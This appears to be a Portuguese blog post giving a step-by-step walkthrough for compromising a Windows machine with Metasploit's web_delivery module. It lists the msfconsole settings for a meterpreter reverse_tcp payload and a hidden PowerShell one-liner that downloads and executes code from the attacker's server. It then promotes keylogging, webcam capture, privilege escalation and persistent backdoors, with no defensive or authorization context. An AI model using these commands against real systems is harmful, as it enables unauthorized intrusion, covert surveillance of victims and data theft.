Entretanto, é necessário que deixemos nossa máquina com o Metasploit (possivelmente na nuvem) já configurada aguardando a conexão.
Nesse exemplo, vamos ver como compromenter uma máquina Windows, entregando um shell meterpreter via PowerShell (poderia ser via Python ou PHP também).
Em primeiro lugar precisamos entrar no msfconsole e digitar os seguintes comandos:
- use exploit/multi/script/web_delivery
- set lhost [Kali IP Address]
- set lport 4444
Quando digitamos o comando "show targets", vemos as opções de entrega do shell, que em nosso caso será PowerShell:
Então, para selecionar o tipo de entrega e o shell que será entregue, digitamos os dois seguintes comandos:
- set target 2
- set payload windows/meterpreter/reverse_tcp
E então executamos o comando "exploit", para colocar nossa máquina numa condição de "listening", que é quando fica aguardando alguém conectar-se para entregar o payload:
E então, na máquina alvo, onde temos acesso físico, digitamos o comando abaixo para forçar a conexão e a entrega do payload:
- powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.168.1.39:8080/eAtfMo'))
E então, na máquina onde temos o Metasploit, veremos uma tentativa de conexão, e uma sessão sendo criada:
E então, ou você já terá um shell via meterpreter com o prompt "meterpreter>" aberto, ou simplesmente precisará digitar o comando "sessions -i [numero-da-sessão]" para conectar-se e começar a brincadeira.
A partir daí, terá todo o poder do meterpreter disponível em suas mãos: keylogger, screenshot, ativar webcam para vídeos e fotos, network sniffing, escalada de privilégios, criar backdoor persistente e etc. Quando quiser finalizar a sessão, basta digitar "exit" e cair de novo no msfconsole.
Have some fun!
Nenhum comentário:
Postar um comentário